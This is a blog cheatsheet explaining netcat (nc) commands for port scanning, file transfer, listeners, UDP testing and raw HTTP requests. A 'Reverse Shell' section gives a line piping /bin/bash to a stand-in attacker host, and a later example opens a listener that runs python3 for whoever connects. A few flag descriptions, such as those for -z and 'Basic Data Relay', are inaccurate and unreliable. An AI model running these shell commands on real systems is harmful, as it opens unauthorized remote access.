Skip to main content
HashnodeHong's Tech Blog

Command Palette

Search for a command to run...

Cheatsheet & Examples: nc

Updated
4 min read
H
Hong
Part of seriesCommon Tasks

Port Scanning

Example Usage:
nc -zv example.com 80 443

What it does:
Scans specified ports on a target host to determine if they are open. The -z option suppresses connection attempts, and -v provides verbose output.

Command-line Arguments Explained:

  • -z: Enables zero-I/O mode, used for port scanning without establishing a connection.
  • -v: Enables verbose mode to display detailed information about the scan.
  • example.com: Target hostname or IP address.
  • 80 443: Port numbers to scan.

Connecting to a Remote Server

Example Usage:
nc example.com 80

What it does:
Establishes a TCP connection to a remote server on a specified port, allowing data to be sent or received.

Command-line Arguments Explained:

  • example.com: Target hostname or IP address.
  • 80: Port number to connect to.

Listening for Incoming Connections

Example Usage:
nc -l 8080

What it does:
Listens for incoming TCP connections on a specified port, acting as a simple server.

Command-line Arguments Explained:

  • -l: Enables listening mode (server).
  • 8080: Port number to listen on.

File Transfer Between Machines

Example Usage:
Receiver: nc -l 9999 > received_file.txt
Sender: nc 192.168.1.1 9999 < send_file.txt

What it does:
Transfers files between two machines over a network by using Netcat as a data conduit.

Command-line Arguments Explained:

  • -l: Enables listening mode on the receiver.
  • 9999: Port number for the transfer.
  • > received_file.txt: Redirects received data to a file.
  • < send_file.txt: Sends the contents of a file to the remote host.

Sending Data to a Server

Example Usage:
echo "GET / HTTP/1.1" | nc example.com 80

What it does:
Sends raw data (e.g., HTTP requests) to a server via a TCP connection.

Command-line Arguments Explained:

  • example.com: Target hostname or IP address.
  • 80: Port number to send data to.

UDP Communication

Example Usage:
nc -u 192.168.1.1 53

What it does:
Establishes a UDP connection to a remote host, useful for testing DNS or other UDP-based services.

Command-line Arguments Explained:

  • -u: Specifies UDP protocol instead of TCP.
  • 192.168.1.1: Target hostname or IP address.
  • 53: Port number (e.g., DNS).

Reverse Shell (Security Use Case)

Example Usage:
nc -e /bin/bash attacker.com 4444

What it does:
Connects to a remote host (e.g., an attacker’s machine) and provides a shell, often used for reverse connections in penetration testing.

Command-line Arguments Explained:

  • -e: Executes the specified command (e.g., /bin/bash) after connecting.
  • attacker.com: Target hostname or IP address.
  • 4444: Port number to connect to.

Timeouts and Connection Management

Example Usage:
nc -w 5 example.com 22

What it does:
Sets a timeout for connection attempts or data transfers. If no response is received within the timeout, the command exits.

Command-line Arguments Explained:

  • -w 5: Sets a 5-second timeout for the connection.
  • example.com: Target host.
  • 22: Port number (e.g., SSH).

Using Source IP/Port

Example Usage:
nc -s 192.168.1.100 -p 5000 example.com 80

What it does:
Specifies a source IP address and port for outgoing connections, useful for testing network interfaces or bypassing firewall rules.

Command-line Arguments Explained:

  • -s 192.168.1.100: Sets the source IP address.
  • -p 5000: Sets the source port.
  • example.com: Target host.
  • 80: Target port.

Creating a Simple Chat Server

Example Usage:
Receiver: nc -l 1234
Sender: nc 192.168.1.1 1234

What it does:
Establishes a basic two-way communication channel between two machines, useful for ad-hoc chat or testing.

Command-line Arguments Explained:

  • -l: Enables listening mode on the receiver.
  • 1234: Port number for the chat channel.
  • 192.168.1.1: Receiver’s IP address (sender’s target).

Redirecting Output to a File

Example Usage:
nc 192.168.1.1 80 > output.html

What it does:
Saves the data received from a remote server (e.g., an HTTP response) to a local file.

Command-line Arguments Explained:

  • 192.168.1.1: Target host.
  • 80: Port number.
  • > output.html: Redirects the received data to a file.

Listening with Keep-Alive (-k)

Example Usage:
nc -l -k 9999

What it does:
Listens for incoming connections and stays active after each connection is closed, allowing continuous use.

Command-line Arguments Explained:

  • -l: Enables listening mode.
  • -k: Keeps the listener running after a connection ends.
  • 9999: Port number.

Testing HTTP Servers

Example Usage:
nc example.com 80
Then type GET / HTTP/1.1 and press Enter twice.

What it does:
Manually interacts with an HTTP server to test responses or troubleshoot issues.

Command-line Arguments Explained:

  • example.com: Target hostname.
  • 80: Port for HTTP.

Basic Data Relay

Example Usage:
nc -u -z 192.168.1.1 53

What it does:
Relays data between hosts using UDP, useful for simple network testing or packet forwarding.

Command-line Arguments Explained:

  • -u: Uses UDP protocol.
  • -z: Scans the port without sending data.
  • 192.168.1.1: Target host.
  • 53: Port for DNS or UDP service.

Running Commands on Connection

Example Usage:
nc -l -p 8080 -e /usr/bin/python3

What it does:
Starts a listener on a port and executes a command (e.g., a Python script) when a connection is made.

Command-line Arguments Explained:

  • -l: Enables listening mode.
  • -p 8080: Specifies the port to listen on.
  • -e /usr/bin/python3: Executes the given command upon connection.
#2articles1week#cheatsheet#cli#nc
12 views

Common Tasks

Part 1 of 50

Quick reference for performing common tasks in Linux/Mac OS.

More from this blog

Hong's Tech Blog

110 posts

The blog is older than you know. I prefer counting from the emergence of one integral anomaly to the emergence of the next, in which case this is the forth version.